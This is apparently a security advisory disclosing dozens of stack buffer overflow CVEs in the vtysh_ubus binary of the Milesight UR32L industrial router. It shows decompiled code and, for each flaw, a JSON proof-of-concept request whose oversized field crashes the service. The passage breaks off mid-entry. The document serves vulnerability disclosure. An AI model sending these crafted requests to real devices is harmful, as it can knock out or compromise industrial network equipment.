CVE-2023-25091,CVE-2023-25107,CVE-2023-25113,CVE-2023-25120,CVE-2023-25122,CVE-2023-25082,CVE-2023-25095,CVE-2023-25117,CVE-2023-25121,CVE-2023-25115,CVE-2023-25118,CVE-2023-25124,CVE-2023-25101,CVE-2023-25123,CVE-2023-25102,CVE-2023-25084,CVE-2023-25093,CVE-2023-25097,CVE-2023-25103,CVE-2023-25096,CVE-2023-25090,CVE-2023-25085,CVE-2023-25106,CVE-2023-25104,CVE-2023-25086,CVE-2023-25088,CVE-2023-25105,CVE-2023-25112,CVE-2023-25089,CVE-2023-25098,CVE-2023-25081,CVE-2023-25094,CVE-2023-25100,CVE-2023-25110,CVE-2023-25109,CVE-2023-25099,CVE-2023-25119,CVE-2023-25083,CVE-2023-25087,CVE-2023-25116,CVE-2023-25092,CVE-2023-25108,CVE-2023-25111,CVE-2023-25114
Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Milesight UR32L v32.3.0.5
UR32L - https://www.milesight-iot.com/cellular/router/ur32l/
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-121 - Stack-based Buffer Overflow
The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.
The Milesight router offers several functionalities through the /cgi endpoint. To call these functionalities, a POST request with the following template data is used:
{
"id": <number>,
"execute": <number>,
"core": "<core_name>",
"function": "<functionality>",
"values": [
{
<data>
}
]
}
Based on the value of the “core”, different classes of functionalities are reached. For instance, the yruo_vpn_openvpn_client “core” offers functions related to changing the OpenVPN client settings.
All the functions, regardless of the “core” and “function”, use the blobmsg structures for parsing the received data.
Many of these functions have a common pattern:
is_equal = strcmp(table_key,<key_value_one>);
if (is_equal == 0) {
command_argument_one = (char *)blobmsg_data(table_value);
}
else{
is_equal = strcmp(table_key,"<key_value_two>");
if (is_equal == 0) {
command_argument_two = (char *)blobmsg_data(table_value);
}
}
[...]
sprintf(vtysh_command_buff,command_format_string,command_argument_one,...);
exec_no_return_debug(vtysh_command_buff, callee_function_name, callee_function_line_number);
[...]
Essentially the common pattern for these functions is to have a loop where all the parameters are parsed from the blobmsg structures, and then a sprintf call is used to compose a command for another service. Finally, the composed command is passed to the exec_no_return_debug to actually execute the command.
A common vulnerable pattern in vtysh_ubus is the use of sprintf with user controllable data. This can lead to a buffer overflow. Following the vulnerable functions we found, the description of the single vulnerability is composed to show which are the blobmsg keys parsed that eventually will reach the vulnerable sprintf call.
Note that the following vulnerabilities require the requests to be sent by a high privileged user.
in the firewall_handler_set function the src and dmz JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"src");
if (is_equal == 0) {
src_string = blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"dmz");
if (is_equal == 0) {
dmz_string = blobmsg_get_string(table_value);
}
}
[...]
Eventually the following portion of code is reached:
[...]
sprintf(vtysh_command_buffer,"firewall dmz %s %s",src_string,dmz_string);
[...]
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_dmz",
"index": 1,
"value": {
"src": "A"*0x300,
"dmz": "POC"
}
}
]
}
in the firewall_handler_set function the old_mac and old_ip JSON keys are used to fetch the respective values:
[...]
else {
is_equal = strcmp(table_key,"old_mac");
if (is_equal == 0) {
old_mac = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"old_ip");
if (is_equal == 0) {
old_ip = (char *)blobmsg_get_string(table_value);
}
}
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"no firewall mac-binding %s %s",old_ip,old_mac);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_mac_binding",
"index": 1,
"value": {
"old_ip": "A"*0x300,
"old_mac": "POC"
}
}
]
}
in the firewall_handler_set function the ip and mac JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"mac");
if (is_equal == 0) {
mac = (char *)blobmsg_get_string(table_value);
}
else {
is_equal_ = strcmp(table_key,"ip");
if (is_equal_ == 0) {
ip = (char *)blobmsg_get_string(table_value);
}
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall mac-binding %s %s",ip,mac);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_mac_binding",
"index": 1,
"value": {
"ip": "A"*0x300,
"mac": "POC"
}
}
]
}
in the firewall_handler_set function the ip, mac and description JSON keys are used to fetch the respective values:
is_equal = strcmp(table_key,"mac");
if (is_equal == 0) {
mac = (char *)blobmsg_get_string(table_value);
}
else {
is_equal_ = strcmp(table_key,"ip");
if (is_equal_ == 0) {
ip = (char *)blobmsg_get_string(table_value);
}
else {
is_equal_ = strcmp(table_key,"description");
if (is_equal_ == 0) {
description = (char *)blobmsg_get_string(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall mac-binding %s %s description %s",ip,mac,description);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_mac_binding",
"index": 1,
"value": {
"description": "A"*0x300,
"mac": "POC",
"ip": "1212",
}
}
]
}
in the firewall_handler_set function the index and to_dst JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"to_dst");
if (is_string == 0) {
to_dst = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit dip %s",index,to_dst);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"to_dst": "A"*0x300,
"index": 1,
}
}
]
}
in the firewall_handler_set function the index and dport JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"dport");
if (is_string == 0) {
dport = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit dport %s",index,dport);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"dport": "A"*0x300,
"index": 1,
}
}
]
}
in the firewall_handler_set function the index and to_dport JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"to_dport");
if (is_string == 0) {
to_dport = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit to-port %s",index,to_dport);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"to_dport": "A"*0x300,
"index": 1,
}
}
]
}
in the firewall_handler_set function the index and description JSON keys are used to fetch the respective values:
[...]
is_string = strcmp(table_key,"description");
if (is_string == 0) {
description = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
index = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit description %s",index, description);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_port_mapping",
"index": 1,
"value": {
"description": "A"*0x300,
"index": 1,
}
}
]
}
in the firewall_handler_set function the interface JSON key is used to fetch the respective value:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"in_acl");
if (is_equal == 0) {
in_acl = blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
if (in_acl != -2) {
if (in_acl == -1) {
[...]
sprintf(vtysh_command_buffer,"no firewall-acl interface %s access-group in",interface);
[...]
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"in_acl": -1,
}
}
]
}
in the firewall_handler_set function the interface and in_acl JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"in_acl");
if (is_equal == 0) {
in_acl = (char *)blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall-acl interface %s access-group %d in",interface,in_acl);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"in_acl": 10,
}
}
]
}
in the firewall_handler_set function the interface JSON key is used to fetch its respective value:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
[...]
is_equal = strcmp(table_key,"out_acl");
if (is_equal == 0) {
out_acl = (char *)blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
if (out_acl != -2) {
if (out_acl == -1) {
[...]
sprintf(vtysh_command_buffer,"no firewall-acl interface %s access-group out",interface);
[...]
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"out_acl":-1,
}
}
]
}
in the firewall_handler_set function the interface and out_acl JSON keys are used to fetch the respective values:
[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
interface = (char *)blobmsg_get_string(table_value);
}
[...]
is_equal = strcmp(table_key,"out_acl");
if (is_equal == 0) {
out_acl = (char *)blobmsg_get_u32(table_value);
}
[...]
This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"firewall-acl interface %s access-group %d out",interface, out_acl);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_firewall_mac_binding",
"function": "set",
"values": [
{
"base": "yruo_firewall_acl",
"index": 1,
"value": {
"interface": "A"*0x300,
"out_acl":10,
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos the class_name JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
if (action != -1 && class_name != (char *)0x0) {
if (action == 3) {
if (is_upload == 0) {
command_format_string = "no traffic download class %s";
}
else {
command_format_string = "no traffic upload class %s";
}
[...]
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,class_name);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"class_list":[{
"class_name":'A'*0x300,
"action":3,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
The set_qos function will call the into_class_node function. Eventually the following portion of code is reached:
if (is_upload == 0) {
command_format_string = "no traffic download class %s";
}
else {
command_format_string = "no traffic upload class %s";
}
sprintf(vtysh_command_buffer,command_format_string + 3,class_name);
The into_class_node function is called with two possible value:
if (action != -1 && class_name != (char *)0x0) {
if (action == 3) {
[...]
}
else {
if ((old_class_name == (char *)0x0) || (*old_class_name == '\0')) {
into_class_node(is_upload,class_name);
}
else {
into_class_node(is_upload,old_class_name);
[...]
}
[...]
}
In the set_qos the class_name and the old_class_name JSON keys are used to fetch its respective values:
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"old_class_name");
if (is_string == 0) {
old_class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(current_table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"class_list":[{
"class_name":'A'*0x300,
"action":2,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos function the rule_name JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"rule_name");
if (is_string == 0) {
rule_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
if (is_upload == 0) {
command_format_string = "no traffic download rule %s";
}
else {
command_format_string = "no traffic upload rule %s";
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,rule_name);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
"rule_name":'A'*0x300,
"action":3,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos function the rule_name JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"rule_name");
if (is_string == 0) {
rule_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
if (is_upload == 0) {
command_format_string = "no traffic download rule %s";
}
else {
command_format_string = "no traffic upload rule %s";
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string + 3,rule_name);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
"rule_name":'A'*0x300,
"action":2,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos function the attach_class JSON key is used to fetch its respective value:
is_string = strcmp(table_key,"attach_class");
if (is_string == 0) {
attach_class = blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
Eventually the following portion of code is reached:
if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
if (action == 3) {
[...]
}
else {
[...]
if (attach_class != 0) {
sprintf(vtysh_command_buffer,"match class %s",attach_class);
exec_cmd_no_return_debug(vtysh_command_buffer,"qos_ubus.c");
}
[...]
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
"attach_class":'A'*0x300,
'rule_name':'A',
"action":2,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos function the source JSON key is used to fetch its respective value:
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
is_string = strcmp(table_key,"source");
if (is_string == 0) {
source = (char *)blobmsg_get_string(table_value);
}
[...]
Eventually the following portion of code is reached:
if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
if (action == 3) {
[...]
}
else {
[...]
if (source != 0) {
if (*source == 0) {
[...]
}
else{
sprintf(vtysh_command_buffer,"match source %s",source);
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
'rule_name':'A',
'source':'A'*0x300,
"action":2,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos function the dest JSON key is used to fetch its respective value:
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
action = blobmsg_get_u32(table_value);
}
[...]
is_string = strcmp(table_key,"dest");
if (is_string == 0) {
dest = (char *)blobmsg_get_string(table_value);
}
[...]
Eventually the following portion of code is reached:
if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
if (action == 3) {
[...]
}
else {
[...]
if (dest != 0) {
if (*dest == 0) {
[...]
}
else{
sprintf(vtysh_command_buffer,"match destination %s",dest);
}
[...]
}
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"rule_list":[{
'rule_name':'A',
'dest':'A'*0x300,
"action":2,
}]
}
}
]
}
the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function.
In the set_qos function the default_class JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"rule_list");
if (((is_equal != 0) &&
(is_equal = strcmp(table_key,"class_list"), is_equal != 0)) &&
(is_equal = strcmp(table_key,"default_class"), is_equal == 0)) {
default_class = blobmsg_get_string(table_value);
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"default-class %s",default_class);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_qos_download",
"function": "set",
"values": [
{
"base": "yruo_qos_upload",
"index": 1,
"value": {
"default_class":"A"*0x300
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function.
In the set_qos function the gre_key JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"gre_key");
if (is_equal == 0) {
gre_key = (char *)blobmsg_get_string(table_value);
if (*gre_key != '\0') {
command_format_string = "tunnel key %s";
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,gre_key);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"gre_key":"A"*0x300
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function.
In the set_dmvpn function the hub_ip and the hub_gre_ip JSON keys are used to fetch its respective values:
is_equal = strcmp(table_key,"hub_ip");
if (is_equal == 0) {
hub_ip = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"hub_gre_ip");
if (is_equal == 0) {
hub_gre_ip = (char *)blobmsg_get_string(table_value);
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip nhrp map %s %s",hub_ip,hub_gre_ip);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"hub_ip":"A"*0x300,
"hub_gre_ip":"POC"
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function.
In the set_dmvpn function the gre_ip and the gre_mask JSON keys are used to fetch its respective values:
is_equal = strcmp(table_key,"gre_ip");
if (is_equal == 0) {
gre_ip = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"gre_mask");
if (is_equal == 0) {
gre_mask = (char *)blobmsg_get_string(table_value);
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address %s %s",gre_ip,gre_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"gre_ip":"A"*0x300,
"gre_mask":"POC"
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_ike_profile function.
In the set_ike_profile function the username and the password JSON keys are used to fetch its respective values:
is_equal = strcmp(table_key,"username");
if (is_equal == 0) {
username = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"password");
if (is_equal == 0) {
password = (char *)blobmsg_get_string(table_value);
}
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"xauth username %s password %s",username,password);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 6,
"execute": 1,
"core": "yruo_vpn_dmvpn",
"function": "set",
"values": [
{
"base": "yruo_vpn_dmvpn",
"index": 1,
"value": {
"username":"A"*0x300,
"password":"POC"
}
}
]
}
the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_ike_profile function.
In the set_ike_profile function the secrets_remote JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"secrets_remote");
if (is_equal == 0) {
if(version != 1){
command_argument = blobmsg_get_string(table_value);
command_format_string = "pre-shared-key remote %s";
[...]
}
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,command_format_string,command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 7,
"execute": 1,
"core": "yruo_vpn_ipsec_client",
"function": "set",
"values": [
{
"base": "yruo_vpn_ipsec_client",
"index": 1,
"value": {
"secrets_remote": "A"*0x300,
"version": 2,
}
}
]
}
the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function.
In the set_gre function the local_virtual_ip and the local_virtual_mask JSON keys are used to fetch its respective values:
is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal == 0) {
local_virtual_ip = (char *)blobmsg_get_string(table_value);
[...]
}
is_equal = strcmp(table_key,"local_virtual_mask");
if (is_equal == 0) {
local_virtual_mask = (char *)blobmsg_get_string(table_value);
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"ip address local %s %s",local_virtual_ip,local_virtual_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"local_virtual_ip": "A"*0x300,
"local_virtual_mask": "POC",
}
}
]
}
the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function.
In the set_gre function the remote_subnet and the remote_mask JSON keys are used to fetch its respective values:
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
remote_subnet = (char *)blobmsg_get_string(table_value);
}
else {
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
remote_mask = (char *)blobmsg_get_string(table_value);
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,"remote subnet %s %s",remote_subnet,remote_mask);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"remote_subnet": "A"*0x300,
"remote_mask": "POC",
}
}
]
}
the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function.
In the set_gre function the remote_ip JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"remote_ip");
if (is_equal == 0) {
vtysh_command_argument = (char *)blobmsg_get_string(table_value);
vtysh_command_format = "tunnel destination %s";
[...]
}
Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"remote_ip": "A"*0x300,
}
}
]
}
the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function.
In the set_gre function the local_ip JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"local_ip");
if (is_equal == 0) {
vtysh_command_argument = (char *)blobmsg_get_string(table_value);
vtysh_command_format = "tunnel source %s";
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"local_ip": "A"*0x300,
}
}
]
}
the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function.
In the set_gre function the remote_virtual_ip JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"remote_virtual_ip");
if (is_equal == 0) {
vtysh_command_argument = (char *)blobmsg_get_string(table_value);
vtysh_command_format = "ip address peer %s";
[...]
} This function will then call the `set_gre` function, Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"remote_virtual_ip": "A"*0x300,
}
}
]
}
the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function.
In the set_gre function the key JSON key is used to fetch its respective value:
is_equal = strcmp(table_key,"key");
if (is_equal == 0) {
vtysh_command_argument = (char *)blobmsg_get_string(table_value);
if (*vtysh_command_argument != '\0') {
vtysh_command_format = "tunnel key %s";
[...]
}
[...]
} Eventually the following portion of code is reached:
sprintf(vtysh_command_buffer,vtysh_command_format,vtysh_command_argument);
This can lead to a buffer overflow in the vtysh_command_buffer buffer.
The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:
{
"id": 9,
"execute": 1,
"core": "yruo_vpn_gre",
"function": "set",
"values": [
{
"base": "yruo_vpn_gre",
"index": 1,
"value": {
"key": "A"*0x300,
}
}
]
}
the vpn_l2tp_handler_set function is the entry point for one of the functionality. This function will eventually call the set_l2tp function.
In the set_l2tp function the remote_subnet and the remote_mask JSON keys are used to fetch its respective values:
is_equal = strcmp(table_key,"remote_subnet");
if (is_equal == 0) {
[...]
if (table_value != (char *)0x0) {
remote_subnet = (char *)blobmsg_data(table_value);
}
}
[...]
is_equal = strcmp(table_key,"remote_mask");
if (is_equal == 0) {
